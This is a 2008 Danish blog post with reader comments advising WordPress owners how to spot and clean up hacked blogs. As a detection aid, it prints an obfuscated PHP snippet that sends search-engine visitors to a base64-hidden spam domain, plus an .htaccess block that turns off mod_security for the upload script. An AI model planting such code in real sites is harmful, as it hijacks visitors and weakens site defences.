Sikkerhedsfejl i WordPress fører til mange hackede blogs
Eftersom WordPress bliver mere og mere populært, er blogs drevet af WP mere og mere udsatte for hacker angreb og forsøg på at “hijacke” blogs. Den seneste stykke tid er en lang række blogs blevet overtaget af spammere og hackere, der ikke “overtager” bloggen helt, men lægger skjult kode ind, back-doors, annoncer og specielt links til spam sider.
Selvom WordPress er et af de mest sikre blogging platforme, bliver nye sikkerhedshuller hele tiden fundet (og lappet hurtigst muligt). Husk derfor at altid opdatere med den nyeste version af WordPress.
Hvis du ikke har den seneste udgave af WordPress, 2.5.1, er der stor sandsynlighed for at din side er hacket, selvom alt virker som det skal. Det sker ofte at der er lagt en backdoor ind, så hackeren har adgang til din blog, samt din adgangskode også kendes af hackeren. Vi anbefaler at du:
- Opgraderer WordPress med det samme
- Opdaterer din adgangskode
Kig efter skjult kode
Tjek derefter grundigt alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval() og base64_decode(). Kig efter kode der ser sådan ud, som regel i din header.php:
< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol",
"cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }? >
Hackere bruger kode som denne (mere kode her) for at lægge skjulte links ind på din side, der ikke kan ses af dem der besøger siden, men kun af søgemaskinerne. Tjek derfor alle filer for kode og specielt links der ikke burde være der.
Tjek din htaccess
Der er også fundet eksempler på at hackere bruger .htaccess til at få adgang til WP-Admin. Åbn din .htaccess fil, som ligger i din WordPress folder. Hvis der ikke er ændret noget, skal den se sådan ud:
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [ L]
# END WordPressDenne kode kan også være der:
< ifmodule mod_security.c>
< files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
< /files>
< /ifmodule>
Hvis der er anden kode end det du har tilføjet det, er det bedst at du opdaterer alle dine WordPress filer (inklusive .htaccess, selvfølgeligt).
Fjern WP version fra meta tags
WordPress blogs bliver automatisk scannet af hackere efter version, på den måde er det nemmere at finde, og hacke, gamle blogs. WordPress bruger en meta tag til at vise hvilken version det er, der ser sådan ud:
< meta content="WordPress <?php bloginfo(’version’); ? />" name="generator" />
Du kan med fordel fjerne denne kode fra din header.php.
Flere tips
- Begræns adgang til din wp-admin folder med .htacces, læs hvordan her.
- Læg en tom index.html fil i din plugins folder, for at skjule hvilke plugins du bruger. Alternativ kan du bruge en index.php fil der viderestiller til din blog, læg
< ?php header("Location: http://www.ditdomæne.dk");?>i en index.php fil og upload den. - Brug plugins som WP Security Scan for at teste sikkerheden.
- Og til sidst, brug altid den seneste WordPress version, brug sikre adgangskoder, og husk altid at tage backup
Til sidst kan du læse om blogs der er blevet udsat for hacking, og deres erfaringer. Læs her, her, her, og her.
June 14th, 2008 at 22:41
Donncha O Caoimh, som er en stor deltager i WordPress projektet har også omtalt hackingen på sin blog.
Jeg kunne ikke lige se et link i dit indlæg til hans rigtig gode indlæg, som giver endnu flere eksempler på de problemer der har været.
Jeg tror også det er gået mange brugeres næse forbi, at der er kommet en lille ekstra sikkerhedsfeature med WordPress 2.5 og frem. Vi er jo mange der er blevet forvendt med WordPress, for det er noget af det tætteste vi kommer til et plug n’ play CMS.
Men man kan smide en lille sikkerhedslinje ind i sin wp-config, for at få kryptering af cookies. Læs mere om SECRET_KEY her.
June 15th, 2008 at 13:08
1. Thomas Clausen:
Tak for meldingen, vi har nu tilføjet et link til artiklen.
June 16th, 2008 at 13:13
Det Kunne være man (læs I
) skulle slå et slag for det sidste link jeg skrev i min kommentar. Jeg ved ikke om det er relateret, men efter jeg tilføjede SECRET_KEY er jeg gået fra 300-400 spam trackback og kommentarer om måneden til ca. 1 
June 17th, 2008 at 23:04
Jeg ved at det nok vil give en enorm belastning på jeres servere, så det vil nok ikke kunne lade sig gøre. Jeg lagde bare mærke til at der fandtes programmer som kunne ligge på serveren og holde øje med disse ting.
Er det noget man på en måde ville kunne få implementeret på sit webhotel?
June 22nd, 2008 at 15:56
Det er dejligt at der (endnu *bank under bordet*) ikke har været lignende problemer med Drupal… =p
June 27th, 2008 at 10:09
I min første kommentar refererede jeg til Donncha O Caoimh som er en af Primus moter på WordPress MU, nu har han lavet et plugin, der gør at man kan tjekke sit WordPress site for kompromitterede filer mm.
September 29th, 2008 at 23:41
Jeg har for nylig skrevet 2 indlæg på min blog omkring de wordpress plugins jeg bruger.
Indlæg 1 findes her og indeholder bl.a. et plugin der med få museklik sørger for at opdatere din wordpress installation, inkl. plugins.
Indlæg 2 findes her og omtaler et andet plugin der hjælper med generel wordpress sikkerhed, der checkes bl.a. for flere af ovenstående tips.
September 29th, 2008 at 23:42
Første link kom åbenbart ikke med. Det findes her: http://www.jesperjarlskov.dk/?p=29
October 25th, 2008 at 17:39
Slet post 4 og 6. Det er udelukkende manuelt arbejde for at få google ranken højere. Se hans sider, og navn. Det hele stinker af SEO!
Plus at personen i øvrigt må være den samme (begge sider er relateret).
October 27th, 2008 at 14:35
9. Lars Sommer:
Tak for det — kommentarerne er hermed slettet.